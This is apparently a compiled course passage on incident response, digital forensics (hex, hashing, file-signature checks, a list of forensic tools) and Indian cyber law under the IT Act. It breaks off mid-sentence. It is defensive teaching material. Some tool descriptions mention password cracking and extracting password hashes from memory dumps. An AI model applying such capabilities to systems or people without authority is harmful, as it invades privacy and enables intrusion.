Formulate/Execute Response Strategy 

• Incident:

- DoS

• Example 

- SMURF attack 



• Strategy 

- Reconfigure router to minimize effect of flooding 

- Establishing perpetrator too costly 

• Likely outcome 

- Reconfiguration reduces effect of flooding 


• Incident: 

- Unauthorized use 

• Example 

- Porn surfing from a company workstation

• Strategy 

- Perform forensic duplication 

- Offline analysis 

- Interview user 

• Likely outcome 

- Suspect identified and evidence collected for disciplinary action. 


• Incident: 

- Computer intrusion 

• Example 

- Buffer-overflow gives intruder root access to critical system 

• Strategy 

- Monitor intruder activities 

- Isolate the machine, reduce problem scope 

- Secure and recover the system 



• Likely outcome 

- Vulnerability identified, system recovered. 

• Incident: 

- Stolen information 

• Example 

- Stolen CC numbers from company database 

• Strategy 

- Issue public statement 

- Perform forensic duplication & analysis 

- Contact LE 

• Likely outcome 

- LE agents participate in investigation 

- Systems offline until problem resolved. 


Authenticate the Evidence 

• It is difficult to show that evidence of any kind collected is the same as 
what was left behind by a criminal 

- Computer drives deteriorate slowly 

- Child pornography and Taliban terror plans don’t show up randomly on 
HD 

- Chain of custody and other handling rules assure the jury that no 
unanticipated or introduced changes occurred. 


- “prove who was at the keyboard” problem 



Investigation 

• Answers 

-Who, what, when, where, how... 

- How you perform the investigation is determined by whether you have a forensic duplicate, or whether you are conducting a live response.

• i.e. you can't get certain portions of a hard disk if working with live response

• ... and you can't do a string search on a swap file under live response


Investigation 

• What is the goal? 

- Search for appropriate types of information 

• Graphics/images 

• Text 

- Problems: 

• There are hundreds or thousands of files 

• “Needle in a stack of needles” problem 

• Files can be hidden 

- Kiddy porn graphic saved as “myhomework.doc” 

- Steganography or alternate data streams 

- Files deleted 

- Dot files (names beginning with '.', hidden by default on Unix)

- Hidden areas of disk 

- obfuscation 
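One of the hiding techniques above, renaming a file so its extension lies about its content, is caught by checking the file's signature (its leading "magic" bytes) instead of its name, the same file-header check the forensic suites listed later apply across a whole image. Added example, not from the original text: the signature table is deliberately small and the sample files are constructed in memory, only their first bytes matter here.

```python
import os

# File signatures ("magic numbers") at offset 0. A small table; real tools ship thousands.
MAGIC = {
    b"\xff\xd8\xff": "jpeg",
    b"\x89PNG\r\n\x1a\n": "png",
    b"GIF87a": "gif",
    b"GIF89a": "gif",
    b"%PDF-": "pdf",
    b"PK\x03\x04": "zip",                          # also .docx/.xlsx/.pptx containers
    b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1": "ole",    # legacy .doc/.xls/.ppt
    b"MZ": "exe",                                  # Windows executables and DLLs
}

# What each extension claims to contain.
EXTENSION_TYPE = {".jpg": "jpeg", ".jpeg": "jpeg", ".png": "png", ".gif": "gif",
                  ".pdf": "pdf", ".zip": "zip", ".docx": "zip", ".xlsx": "zip",
                  ".doc": "ole", ".xls": "ole", ".exe": "exe", ".dll": "exe"}


def identify(data: bytes):
    """Return the type implied by the leading bytes, or None if no signature matches."""
    for magic, kind in MAGIC.items():
        if data.startswith(magic):
            return kind
    return None


def check_file(name: str, data: bytes) -> dict:
    claimed = EXTENSION_TYPE.get(os.path.splitext(name)[1].lower())
    actual = identify(data)
    # Only a disagreement between two known types is a finding; an unknown
    # extension or unknown content needs a closer look, not an alert.
    return {"name": name, "claimed": claimed, "actual": actual,
            "mismatch": claimed is not None and actual is not None and claimed != actual}


# Constructed samples: a few header bytes followed by padding.
SAMPLES = {
    "myhomework.doc": b"\xff\xd8\xff\xe0\x00\x10JFIF\x00" + b"\x00" * 32,   # JPEG hiding as .doc
    "report.docx": b"PK\x03\x04\x14\x00" + b"\x00" * 32,
    "photo.jpg": b"\xff\xd8\xff\xe1" + b"\x00" * 32,
    "setup.pdf": b"MZ\x90\x00\x03\x00" + b"\x00" * 32,                       # executable as .pdf
    "notes.txt": b"just some text\n",
}


def suspicious(samples: dict) -> list:
    """Names whose extension disagrees with their content, in input order."""
    return [name for name, data in samples.items() if check_file(name, data)["mismatch"]]


if __name__ == "__main__":
    for name, data in SAMPLES.items():
        print(check_file(name, data))
```

On a real image the same loop runs over every file (or, as Bulk Extractor does, over raw blocks with no file system at all), and the mismatch list is the starting point for the examiner rather than the conclusion: a .doc that is really a JPEG still has to be opened and documented.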


Why HEX?

• While hex is less readable than ASCII text, it is more readable than the binary the machine understands...

- The number 65535 would be written down as sixteen ones: 1111111111111111 (base 2)

- Prone to error... was that 16 or 17 1's?

- To condense the same information we use a base 16 system, called hexadecimal.


What is HEX?

• Hex uses the decimal digits 0-9 first, followed by the alphabetic characters A-F for the values 10-15.

• It is fairly straightforward to convert back and forth between binary and hex: each hex digit is exactly four binary digits.


Converting

• If you write down 1234 (base 10) you are talking about the number one thousand, two hundred and thirty four.

• This can be rewritten as:

1 * 10^3
2 * 10^2
3 * 10^1
4 * 10^0

• It is the same in all other bases; each place represents a power of the base:

%1010 (binary) would be          0x1234 (hex) would be

1 * 2^3                          1 * 16^3
0 * 2^2                          2 * 16^2
1 * 2^1                          3 * 16^1
0 * 2^0                          4 * 16^0


• What is 0xCB in decimal?

• C = 12 and B = 11, so

12 * 16^1 + 11 * 16^0 = 203

What about binary?

C = 12 = 1100, B = 11 = 1011
CB = 1100 1011

so 0xCB = %11001011


What is 0xAF1 in decimal?

• A = 10, F = 15, so

10 * 16^2 + 15 * 16^1 + 1 * 16^0 = 2801

What about binary?

A = 1010, F = 1111, 1 = 0001
AF1 = 1010 1111 0001

so 0xAF1 = %101011110001



Hashing

• ...similarly, a digital hash is a unique representation of a larger object - like an image

• The hash is completely separate from the image it fingerprints and has a fixed length - like 128 or 160 bits.

• A 1 MB file and a 1 GB file will both produce hashes of the same length

• The general idea is that a very small (any) change in the source file results in a very large change in the hash

• The hashes we are referring to are "one-way" hashes

• MD5 - 128 bits

• SHA-1 - 160 bits

• SHA-256 - 256 bits

• ...SHA-384, SHA-512

• MD5 and SHA-1 are no longer collision resistant (practical collisions have been published), so record SHA-256 alongside them rather than relying on either alone
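The chain-of-custody section above (hash the evidence, time and date stamp it before and after capture) and the hash properties listed here are shown together in the following added example, which is not from the original text; the evidence bytes are constructed and the custody record format is an assumption, not any tool's.

```python
import hashlib
from datetime import datetime, timezone

ALGORITHMS = ("md5", "sha1", "sha256")


def hash_bytes(data: bytes) -> dict:
    """Hex digests of the evidence under each algorithm."""
    return {name: hashlib.new(name, data).hexdigest() for name in ALGORITHMS}


def digest_bits(hexdigest: str) -> int:
    return len(hexdigest) * 4     # two hex characters per byte, 8 bits per byte


def flip_bit(data: bytes, bit: int) -> bytes:
    """Return a copy of data with one bit inverted (the 'very small change')."""
    out = bytearray(data)
    out[bit // 8] ^= 1 << (bit % 8)
    return bytes(out)


def bits_changed(hex_a: str, hex_b: str) -> int:
    """Hamming distance between two digests of equal length."""
    return bin(int(hex_a, 16) ^ int(hex_b, 16)).count("1")


def custody_entry(item_id: str, data: bytes, handler: str, action: str) -> dict:
    """One chain-of-custody record: who did what, when, and the hashes at that moment."""
    return {"item": item_id, "handler": handler, "action": action,
            "timestamp": datetime.now(timezone.utc).isoformat(timespec="seconds"),
            "hashes": hash_bytes(data)}


def verify(entry: dict, data: bytes) -> bool:
    """Re-hash the evidence and compare against the record; any difference fails."""
    return hash_bytes(data) == entry["hashes"]


# Constructed stand-in for an acquired disk image (16 KiB of repeating bytes).
EVIDENCE = bytes(range(256)) * 64


if __name__ == "__main__":
    record = custody_entry("IMG-001", EVIDENCE, "examiner A", "acquired")
    for name, digest in record["hashes"].items():
        print(f"{name:<7} {digest_bits(digest):>3} bits  {digest}")
    tampered = flip_bit(EVIDENCE, 4096)
    print("sha256 bits changed by one flipped bit:",
          bits_changed(record["hashes"]["sha256"], hash_bytes(tampered)["sha256"]))
    print("original verifies:", verify(record, EVIDENCE),
          " tampered verifies:", verify(record, tampered))
```

Run it and the three digest lengths come out as 128, 160 and 256 bits regardless of input size, flipping a single bit in the image changes roughly half of the SHA-256 output bits, and the tampered copy fails verification against the record made at acquisition. Each later handover adds another entry with the same hashes and a new timestamp, which is the documentary trail the "who took it out of storage and why" questions ask for.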


33. Forensics Tool 


Computer forensics is an important branch of computer science concerned with computer and Internet related crimes. Earlier, computers were only used to produce data, but the field has now expanded to all devices that hold digital data. The goal of computer forensics is to support crime investigations by using evidence from digital data to find who was responsible for a particular crime.

For better research and investigation, developers have created many computer 
forensics tools. Police departments and investigation agencies select the tools 
based on various factors including budget and available experts on the team. 


These computer forensics tools can also be classified into various categories: 

• Disk and data capture tools 

• File viewers 

• File analysis tools 

• Registry analysis tools 

• Internet analysis tools 

• Email analysis tools 

• Mobile devices analysis tools 

• Mac OS analysis tools 

• Network forensics tools 

• Database forensics tools 


1. Digital Forensics Framework 

Digital Forensics Framework is another popular platform dedicated to digital forensics. The tool is open source and comes under the GPL license. It can be used by professionals or non-experts without any trouble. It can be used for the digital chain of custody, to access remote or local devices, for forensics of Windows or Linux OS, recovery of hidden or deleted files, quick search of files' metadata, and various other things.

Download: http://www.digital-forensic.org/ 


2. Open Computer Forensics Architecture 

Open Computer Forensics Architecture (OCFA) is another popular distributed 
open-source computer forensics framework. This framework was built on Linux 
platform and uses postgreSQL database for storing data. 

It was built by the Dutch National Police Agency for automating digital forensics 
process. It is available to download under GPL license. 

Download: http://sourceforge.net/projects/ocfa/


3. CAINE 

CAINE (Computer Aided Investigative Environment) is the Linux distro created 
for digital forensics. It offers an environment to integrate existing software tools as 
software modules in a user friendly manner. This tool is open source. 

Read More about it: http://www.caine-live.net/ 


4. X-Ways Forensics 

X-Ways Forensics is an advanced platform for digital forensics examiners. It runs on all available versions of Windows. It claims to not be very resource hungry and to work efficiently. Its key features are listed below:

• Disk imaging and cloning 

• Ability to read file system structures inside various image files 

• It supports most of the file systems including FAT12, FAT16, FAT32, 
exFAT, TFAT, NTFS, Ext2, Ext3, Ext4, Next3®, CDFS/ISO9660/Joliet, 
UDF 


Automatic detection of deleted or lost hard disk partition 
Various data recovery techniques and powerful file carving 
Bulk hash calculation 

Viewing and editing binary data structures using templates 

Easy detection of and access NTFS ADS 

Well maintained file header 

Automated activity logging 

Data authenticity 

Complete case management 

Memory and RAM analysis 

Gallery view for pictures 

Internal viewer for Windows registry file 

Automated registry report 

Extracts metadata from various file types 

Ability to extract emails from various available email clients. 

And many more.. 


5. SANS Investigative Forensics Toolkit - SIFT 

SANS Investigative Forensics Toolkit or SIFT is a multi-purpose forensic operating system which comes with all the necessary tools used in the digital forensic process. It is built on Ubuntu with many tools related to digital forensics. Earlier this year, SIFT 3.0 was released. It comes free of charge and contains free open-source forensic tools.

In a previous post at resource.infosecinstitute.com, we already covered SIFT in 
detail. You can read those posts about SIFT to know more about this digital 
forensics platform. 

Download: http://digital-forensics.sans.org/community/downloads


6. EnCase 


EnCase is another popular multi-purpose forensic platform with many nice tools 
for several areas of the digital forensic process. This tool can rapidly gather data 
from various devices and unearth potential evidence. It also produces a report 
based on the evidence. 

This tool does not come for free. The license costs $995. 

Read more about EnCase: 

https://www.guidancesoftware.com/products/Pages/encase-forensic/overview.aspx 


7. Registry Recon 

Registry Recon is a popular registry analysis tool. It extracts the registry 
information from the evidence and then rebuilds the registry representation. It can 
rebuild registries from both current and previous Windows installations. 

It is not a free tool. It costs $399. 

Read more about it: http://arsenalrecon.com/apps/recon/ 


8. The Sleuth Kit 

The Sleuth Kit is a Unix and Windows based tool which helps in forensic analysis 
of computers. It comes with various tools which helps in digital forensics. These 
tools help in analyzing disk images, performing in-depth analysis of file systems, 
and various other things. 

Read more about it here: http://www.sleuthkit.org/ 


9. Libforensics


Libforensics is a library for developing digital forensics applications. It was developed in Python and comes with various demo tools to extract information from various types of evidence.

Read more here: http://code.google.com/p/libforensics/


10. Volatility 

Volatility is a memory forensics framework used for incident response and malware analysis. With this tool, you can extract information about running processes, network sockets, network connections, DLLs and registry hives from a memory image. It also has support for extracting information from Windows crash dump files and hibernation files. This tool is available for free under the GPL license.

Read more about the tool: http://code.google.com/p/volatility/


11. WindowsSCOPE 

WindowsSCOPE is another memory forensics and reverse engineering tool used 
for analyzing volatile memory. It is basically used for reverse engineering of 
malwares. It provides the capability of analyzing the Windows kernel, drivers, 
DLLs, virtual and physical memory. 

Read more: 

http://www.windowsscope.com/index.php?page=shop.product_details&flypage=flypage.tpl&product_id=35&category_id=3&option=com_virtuemart


12. The Coroner’s Toolkit 


The Coroner’s Toolkit or TCT is also a good digital forensic analysis tool. It runs 
under several Unix-related operating systems. It can be used to aid analysis of 
computer disasters and data recovery. 

Read more: http://www.porcupine.org/forensics/tct.html 


13. Oxygen Forensic Suite 

Oxygen Forensic Suite is a nice software to gather evidence from a mobile phone 
to support your case. This tool helps in gathering device information (including 
manufacturer, OS, IMEI number, serial number), contacts, messages (emails, SMS, 
MMS), recover deleted messages, call logs and calendar information. It also lets 
you access and analyze mobile device data and documents. It generates easy to 
understand reports for better understanding. 

More information here: http://www.oxygen-forensic.com/en/features 


14. Bulk Extractor 

Bulk Extractor is also an important and popular digital forensics tool. It scans the 
disk images, file or directory of files to extract useful information. In this process, 
it ignores the file system structure, so it is faster than other available similar kinds 
of tools. It is basically used by intelligence and law enforcement agencies in 
solving cyber crimes. 

Download it here: http://digitalcorpora.org/downloads/bulk extractor/ 


15. Xplico 

Xplico is an open source network forensic analysis tool. It is basically used to extract useful data from applications which use Internet and network protocols. It supports most of the popular protocols including HTTP, IMAP, POP, SMTP, SIP, TCP, UDP and others. Output data of the tool is stored in an SQLite or MySQL database. It supports both IPv4 and IPv6.

Read more about this tool here: http://www.xplico.org/about 


16. Mandiant RedLine 

Mandiant RedLine is a popular tool for memory and file analysis. It collects 
information about running processes on a host, drivers from memory and gathers 
other data like meta data, registry data, tasks, services, network information and 
Internet history to build a proper report. 

Read more here: https://www.mandiant.com/resources/download/redline 


17. Computer Online Forensic Evidence Extractor (COFEE) 

Computer Online Forensic Evidence Extractor or COFEE is a tool kit developed 
for computer forensic experts. This tool was developed by Microsoft to gather 
evidence from Windows systems. It can be installed on a USB pen drive or 
external hard disk. Just plug in the USB device in the target computer and it starts a 
live analysis. It comes with 150 different tools with a GUI based interface to 
command the tools. It is fast and can perform the whole analysis in as few as 20 
minutes. To law enforcement agencies, Microsoft provides free technical support 
for the tool. 

Official website: https://cofee.nw3c.org/ 


18. P2 eXplorer 


P2 eXplorer is a forensic image mounting tool which aims to help investigating 
officers with examination of a case. With this image, you can mount forensic 
images as a read-only local and physical disc and then explore the contents of the 
image with file explorer. You can easily view deleted data and unallocated space 
of the image. 

It can mount several images at a time. It supports most of the image formats including EnCase, SafeBack, PFR, FTK DD, WinImage, raw images from Linux dd, and VMware images. It supports both logical and physical image types.

This tool comes for $199, but you can grab the limited feature version of the tool 
for free. 

Read more here: https://www.paraben.com/p2-explorer.html 


19. PlainSight 

PlainSight is another useful digital forensics tool. It is a CD-based tool built on 
Knoppix, a Linux distribution. Some of its uses include viewing Internet histories, data 
carving, checking USB device usage, extracting password hashes from memory dumps, 
information gathering, examining Windows firewall configuration, seeing recent 
documents, and other useful tasks. To use this tool, you only need to boot from 
the CD and follow the instructions. 

This tool is available for free. 

Read more here: http://www.plainsight.info/index.html 


20. XRY 


XRY is a mobile forensics tool developed by Micro Systemation. It is used to 
analyze and recover crucial information from mobile devices. This tool comes with 
a hardware device and software. The hardware connects mobile phones to a PC and 
the software performs the analysis of the device and extracts data. It is designed to 
recover data for forensic analysis. 

The latest version of the tool can recover data from all kinds of smartphones, 
including Android, iPhone and BlackBerry. It gathers deleted data like call records, 
images, SMS and text messages. 

Read more about it: http://www.msab.com/xrv/what-is-xry 


21. HELIX3 

HELIX3 is a live CD-based digital forensic suite created to be used in incident 
response. It comes with many open source digital forensics tools, including hex 
editors, data carving and password cracking tools. If you want the free version, you 
can go for Helix3 2009R1. After this release, the project was taken over by a 
commercial vendor, so you need to pay for the most recent version of the tool. 

This tool can collect data from physical memory, network connections, user 
accounts, executing processes and services, scheduled jobs, the Windows Registry, 
chat logs, screen captures, SAM files, applications, drivers, environment variables 
and Internet history. It then analyzes and reviews the data to generate the 
compiled results as reports. 

Helix3 2008R1 can be downloaded here: https://e-fenseine.sharefile.com/d/sda4309a624d48b88 


The enterprise version is available here: http://www.e-fense.com/h3-enterprise.php 


34. IT Act And Cyber Law 


What is Cyber Law? 

Cyber Law is the law governing cyber space. Cyber space is a very wide 
term and includes computers, networks, software, data storage devices 
(such as hard disks, USB disks etc), the Internet, websites, emails and 
even electronic devices such as cell phones, ATM machines etc. 


Law encompasses the rules of conduct: 

1. that have been approved by the government, and 

2. which are in force over a certain territory, and 

3. which must be obeyed by all persons on that territory. 


Cyber law encompasses laws relating to: 

1. Cyber Crimes 

2. Electronic and Digital Signatures 

3. Intellectual Property 

4. Data Protection and Privacy 


Cyber crimes are unlawful acts where the computer is used 
either as a tool or a target or both. The enormous growth in 
electronic commerce (e-commerce) and online share trading has 
led to a phenomenal spurt in incidents of cyber crime. These 
crimes are discussed in detail further in this chapter. A 
comprehensive discussion on the Indian law relating to cyber 
crimes and digital evidence is provided in the ASCL publication 
titled “Cyber Crimes & Digital Evidence - Indian Perspective”. 


Electronic signatures are used to authenticate electronic 
records. Digital signatures are one type of electronic signature. 
Digital signatures satisfy three major legal requirements - signer 
authentication, message authentication and message integrity. 
The technology and efficiency of digital signatures makes them 
more trustworthy than hand written signatures. These issues are 
discussed in detail in the ASCL publication titled “Ecommerce - 
Legal Issues”. 
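As an added illustration of those three requirements (this is not part of the original text or of any ASCL publication), the following Go program signs a constructed sample record with an Ed25519 key pair from Go's standard library and shows that verification succeeds only for the unaltered record checked against the actual signer's public key. The names Signer, Demonstrate and the sample record text are this example's own assumptions.

```go
package main

import (
	"crypto/ed25519"
	"crypto/rand"
	"fmt"
)

// Signer holds one party's Ed25519 key pair. The private key stays with
// the signer; the public key is what a relying party uses to check the
// signature. (Hypothetical type for this illustration.)
type Signer struct {
	Public  ed25519.PublicKey
	private ed25519.PrivateKey
}

// NewSigner generates a fresh key pair for the illustration.
func NewSigner() (*Signer, error) {
	pub, priv, err := ed25519.GenerateKey(rand.Reader)
	if err != nil {
		return nil, err
	}
	return &Signer{Public: pub, private: priv}, nil
}

// SignRecord produces the digital signature over an electronic record.
func (s *Signer) SignRecord(record []byte) []byte {
	return ed25519.Sign(s.private, record)
}

// VerifyRecord reports whether sig is a valid signature by the holder of
// pub over exactly this record. A false result means either the record
// was altered after signing (message authentication and integrity fail)
// or it was not signed by pub's owner (signer authentication fails).
func VerifyRecord(pub ed25519.PublicKey, record, sig []byte) bool {
	if len(pub) != ed25519.PublicKeySize || len(sig) != ed25519.SignatureSize {
		return false
	}
	return ed25519.Verify(pub, record, sig)
}

// Outcome collects the three checks the text describes.
type Outcome struct {
	Genuine     bool // untouched record, correct signer: must verify
	Tampered    bool // record altered after signing: must fail
	WrongSigner bool // same record, checked against another party's key: must fail
}

// Demonstrate runs the three checks on a constructed sample record.
func Demonstrate() (Outcome, error) {
	alice, err := NewSigner()
	if err != nil {
		return Outcome{}, err
	}
	other, err := NewSigner()
	if err != nil {
		return Outcome{}, err
	}

	// Constructed sample electronic record (not taken from the page).
	record := []byte("Transfer Rs 10,000 from account 1234 to account 5678")
	sig := alice.SignRecord(record)

	// Altered copy of the record: one digit changed after signing.
	altered := []byte("Transfer Rs 90,000 from account 1234 to account 5678")

	return Outcome{
		Genuine:     VerifyRecord(alice.Public, record, sig),
		Tampered:    VerifyRecord(alice.Public, altered, sig),
		WrongSigner: VerifyRecord(other.Public, record, sig),
	}, nil
}

func main() {
	out, err := Demonstrate()
	if err != nil {
		panic(err)
	}
	fmt.Printf("genuine record verifies:     %v\n", out.Genuine)
	fmt.Printf("altered record verifies:     %v\n", out.Tampered)
	fmt.Printf("other party's key verifies:  %v\n", out.WrongSigner)
}
```

Only the first check returns true: changing a single digit of the record, or checking the signature against a key that did not produce it, makes verification fail, which is what gives a digital signature its evidentiary value.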


Intellectual property refers to creations of the human mind, e.g. 
a story, a song, a painting, a design etc. The facets of 
intellectual property that relate to cyber space are covered by 
cyber law. 


These include: 

• copyright law in relation to computer software, computer source code, 
websites, cell phone content etc, 

• software and source code licences 

• trademark law with relation to domain names, meta tags, mirroring, 
framing, linking etc 

• semiconductor law which relates to the protection of semiconductor 
integrated circuits design and layouts, 

• patent law in relation to computer hardware and software. These issues 
are discussed in detail in the ASCL publication titled “IPR & Cyberspace - 
the Indian Perspective”. 

Data protection and privacy laws aim to achieve a fair balance between 
the privacy rights of the individual and the interests of data controllers such 
as banks, hospitals, email service providers etc. These laws seek to 
address the challenges to privacy caused by collecting, storing and 
transmitting data using new technologies. 


Need for Cyber Law 

There are various reasons why it is extremely difficult for conventional 
law to cope with cyberspace. Some of these are discussed below. 


1. Cyberspace is an intangible dimension that is impossible to 
govern and regulate using conventional law. 

2. Cyberspace has complete disrespect for jurisdictional 
boundaries. A person in India could break into a bank’s 
electronic vault hosted on a computer in USA and transfer 
millions of Rupees to another bank in Switzerland, all within 
minutes. All he would need is a laptop computer and a cell phone. 

3. Cyberspace handles gigantic traffic volumes every second. 

Billions of emails are crisscrossing the globe even as we read 
this, millions of websites are being accessed every minute and 
billions of dollars are electronically transferred around the world 
by banks every day. 



4. Cyberspace is absolutely open to participation by all. A ten-year-old 
in Bhutan can have a live chat session with an eight-year-old 
in Bali without any regard for the distance or the 
anonymity between them. 

5. Cyberspace offers enormous potential for anonymity to its 
members. Readily available encryption software and 
steganographic tools that seamlessly hide information within 
image and sound files ensure the confidentiality of information 
exchanged between cyber-citizens. 

6. Cyberspace offers never-seen-before economic efficiency. 
Billions of dollars worth of software can be traded over the 
Internet without the need for any government licenses, shipping 
and handling charges and without paying any customs duty. 

7. Electronic information has become the main object of cyber 
crime. It is characterized by extreme mobility, which exceeds by 
far the mobility of persons, goods or other services. International 
computer networks can transfer huge amounts of data around the 
globe in a matter of seconds. 

8. A software source code worth crores of rupees or a movie can be 
pirated across the globe within hours of their release. 

9. Theft of corporeal information (e.g. books, papers, CD ROMs, 
floppy disks) is easily covered by traditional penal provisions. 
However, the problem begins when electronic records are copied 
quickly, inconspicuously and often via telecommunication 
facilities. Here the “original” information, so to say, remains in the 
“possession” of the “owner” and yet information gets stolen. 



Jurisprudence of Indian Cyber Law 


Note: The Act, rules, regulations, orders etc referred to 
in this section are discussed in more detail in the Chapter 3 titled 
“Introduction to Indian Cyber Law”. 


The primary source of cyber law in India is the Information Technology 
Act, 2000 (IT Act) which came into force on 17 October 2000. 


The primary purpose of the Act is to provide legal 
recognition to electronic commerce and to facilitate 
filing of electronic records with the Government. 

The IT Act also penalizes various cyber crimes and 
provides strict punishments (imprisonment terms up to 10 
years and compensation up to Rs 1 crore). 

An Executive Order dated 12 September 2002 contained 
instructions relating to provisions of the Act with regard to 
protected systems and application for the issue of a Digital 
Signature Certificate. 

Minor errors in the Act were rectified by the Information 
Technology (Removal of Difficulties) Order, 2002 
which was passed on 19 September 2002. 



The IT Act was amended by the Negotiable Instruments 
(Amendments and Miscellaneous Provisions) Act, 
2002. This introduced the concept of electronic cheques 
and truncated cheques. 

Information Technology (Use of Electronic Records 
and Digital Signatures) Rules, 2004 has provided the 
necessary legal framework for filing of documents with the 
Government as well as issue of licenses by the Government. 

It also provides for payment and receipt of fees in relation to the 
Government bodies. 


On the same day, the Information Technology (Certifying Authorities) 
Rules, 2000 also came into force. 

These rules prescribe the eligibility, appointment and 
working of Certifying Authorities (CA). These rules also lay 
down the technical standards, procedures and security 
methods to be used by a CA. 

These rules were amended in 2003, 2004 and 2006. 


Information Technology (Certifying Authority) 
Regulations, 2001 came into force on 9 July 2001. They 
provide further technical standards and procedures to be 
used by a CA. 

Two important guidelines relating to CAs were issued. The 
first are the Guidelines for submission of application for 
license to operate as a Certifying Authority under the IT 
Act. These guidelines were issued on 9th July 2001. 



Next were the Guidelines for submission of certificates 
and certification revocation lists to the Controller of 
Certifying Authorities for publishing in National Repository 
of Digital Certificates. These were issued on 16th 
December 2002. 


The Cyber Regulations Appellate Tribunal (Procedure) Rules, 2000 
also came into force on 17th October 2000. 

These rules prescribe the appointment and working of the 
Cyber Regulations Appellate Tribunal (CRAT) whose 
primary role is to hear appeals against orders of the 
Adjudicating Officers. 

The Cyber Regulations Appellate Tribunal (Salary, 
Allowances and other terms and conditions of service 
of Presiding Officer) Rules, 2003 prescribe the salary, 
allowances and other terms for the Presiding Officer of the 
CRAT. 

Information Technology (Other powers of Civil Court 
vested in Cyber Appellate Tribunal) Rules 2003 
provided some additional powers to the CRAT. 

On 17th March 2003, the Information Technology (Qualification and 
Experience of Adjudicating Officers and Manner of Holding Enquiry) 
Rules, 2003 were passed. 

These rules prescribe the qualifications required for 
Adjudicating Officers. Their chief responsibility under the 
IT Act is to adjudicate on cases such as unauthorized 
access, unauthorized copying of data, spread of viruses, 
denial of service attacks, disruption of computers, 
computer manipulation etc. 



These rules also prescribe the manner and mode of 
inquiry and adjudication by these officers. 


The appointment of adjudicating officers to decide the fate of multi-crore 
cyber crime cases in India was the result of the public interest litigation 
filed by students of Asian School of Cyber Laws (ASCL). 


The Government had not appointed the Adjudicating Officers or the 
Cyber Regulations Appellate Tribunal for almost 2 years after the 
passage of the IT Act. This prompted ASCL students to file a Public 
Interest Litigation (PIL) in the Bombay High Court asking for a 
speedy appointment of Adjudicating officers. 

The Bombay High Court, in its order dated 9th October 2002, directed the 
Central Government to announce the appointment of adjudicating officers 
in the public media to make people aware of the appointments. The 
division bench of the Mumbai High Court consisting of Hon’ble Justice 
A.P. Shah and Hon’ble Justice Ranjana Desai also ordered that the 
Cyber Regulations Appellate Tribunal be constituted within a reasonable 
time frame. 

Following this the Central Government passed an order dated 23rd March 
2003 appointing the “Secretary of Department of Information Technology 
of each of the States or of Union Territories” of India as the adjudicating 
officers. 


The Information Technology (Security Procedure) Rules, 2004 came 
into force on 29th October 2004. They prescribe provisions relating to 
secure digital signatures and secure electronic records. 



Also relevant are the Information Technology (Other 
Standards) Rules, 2003. 

An important order relating to blocking of websites was passed on 
27th February, 2003. 

Computer Emergency Response Team (CERT-IND) can 
instruct Department of Telecommunications (DOT) to 
block a website. 

The Indian Penal Code (as amended by the IT Act) penalizes several 
cyber crimes. These include forgery of electronic records, cyber frauds, 
destroying electronic evidence etc. 

Digital Evidence is to be collected and proven in court as per the 
provisions of the Indian Evidence Act (as amended by the IT Act). 

In case of bank records, the provisions of the Bankers’ Book Evidence 
Act (as amended by the IT Act) are relevant. 

Investigation and adjudication of cyber crimes is done in accordance with 
the provisions of the Code of Criminal Procedure and the IT Act. 

The Reserve Bank of India Act was also amended by the IT Act. 


Evolution of key terms and concepts 

Computer 

(According to section 2(1)(i) of the IT Act) 

"computer" means any electronic, magnetic, optical or other 
high-speed data processing device or system which performs 
logical, arithmetic, and memory functions by manipulations of 
electronic, magnetic or optical impulses, and includes all input, 
output, processing, storage, computer software, or 
communication facilities which are connected or related to the 
computer in a computer system or computer network; 

Simply put, a computer has the following characteristics: 

1. It is a high-speed data processing device or system. 

2. It may be electronic, magnetic, optical etc. 

3. It performs logical, arithmetic, and memory functions. 

4. These functions are performed by manipulations of electronic, 
magnetic or optical impulses. 

Computer includes 

1. all input facilities, 

2. all output facilities, 

3. all processing facilities, 

4. all storage facilities, 

5. all computer software facilities, and 

6. all communication facilities 

which are connected or related to the computer in a computer system 
or computer network. 



Magnetic means having the properties of a 
magnet; i.e. of attracting iron or steel e.g. 
parts of a hard disk are covered with a thin 
coat of magnetic material. 

Simply put, an optical computer uses light 
instead of electricity to manipulate, store 
and transmit data. Development of this 
technology is still in a nascent stage. 

Optical data processing can perform 
several operations simultaneously (in 
parallel) much faster and easier than 
electronics. 

Optical fibre is the medium and the 
technology associated with the 
transmission of information as light pulses 
along a glass or plastic wire or fibre. 

Optical fibre carries much more information 
than conventional copper wire and is in 
general not subject to electromagnetic 
interference. 

A data processing device or system is a 
mechanism that can perform pre-defined 
operations upon information. 

The following are illustrations of functions 
in relation to a conventional desktop personal computer. 

• saving information on a hard disk, 

• logging on to the Internet, 

• retrieving stored information, 

• calculating mathematical formulae. 



Logical functions, simply put, refer to non-arithmetic 
processing that arranges 
numbers or letters according to a 
predefined format, e.g. arranging numbers 
in ascending order, arranging words 
alphabetically etc. 

Arithmetic functions, simply put, are 
operations concerned or involved with 
mathematics and the addition, subtraction, 
multiplication and division of numbers. 

Memory functions, simply put, refer to 
operations involving storage of data. 


Input facilities are those which transfer 
information from the outside world into a 
computer system. E.g. keyboard, mouse, 
touch screen, joystick, microphone, 
scanner etc. 

Output facilities are those which transfer 
data out of the computer in the form of text, 
images, sounds etc to a display screen, 
printer, storage device etc. 

Hard disks, USB disks, floppies act as both 
input and output facilities. 

Processing facilities primarily refer to the 
Central Processing Unit (CPU) of a 
computer. Referred to as the “brain” of the 
computer, the CPU processes instructions 
and data. 



Storage facilities include hard disks and 
other data storage facilities. This term 
would also include the physical cabinet in 
which a computer is housed. 

Computer software facilities refer to the 
operating system and application software 
that are essential for a computer to function 
in a useful manner. 

Communication facilities include the 
network interface cards, modems and other 
devices that enable a computer to 
communicate with other computers. 

Illustrations 

Considering the wide definition given to the 
term computer by the IT Act the following 
are examples of “computers”: 

• desktop personal computers 

• mobile phones 

• microwave ovens 

• computer printers 

• scanners 

• installed computer software 

• Automatic Teller Machine (ATM) 

• “smart” homes which can be 
controlled through the Internet 



Relevant Case Law 


In an interesting case, the Karnataka High Court laid down 
that ATMs are not computers, but are electronic 
devices under the Karnataka Sales Tax Act, 1957. 

Diebold Systems Pvt Ltd [a manufacturer and supplier of 
Automated Teller Machines (ATM)] had sought a 
clarification from the Advance Ruling Authority (ARA) in 
Karnataka on the rate of tax applicable under the 
Karnataka Sales Tax Act, 1957 on sale of ATMs. 

The majority view of the ARA was to classify ATMs as 
"computer terminals" liable for 4% basic tax as they 
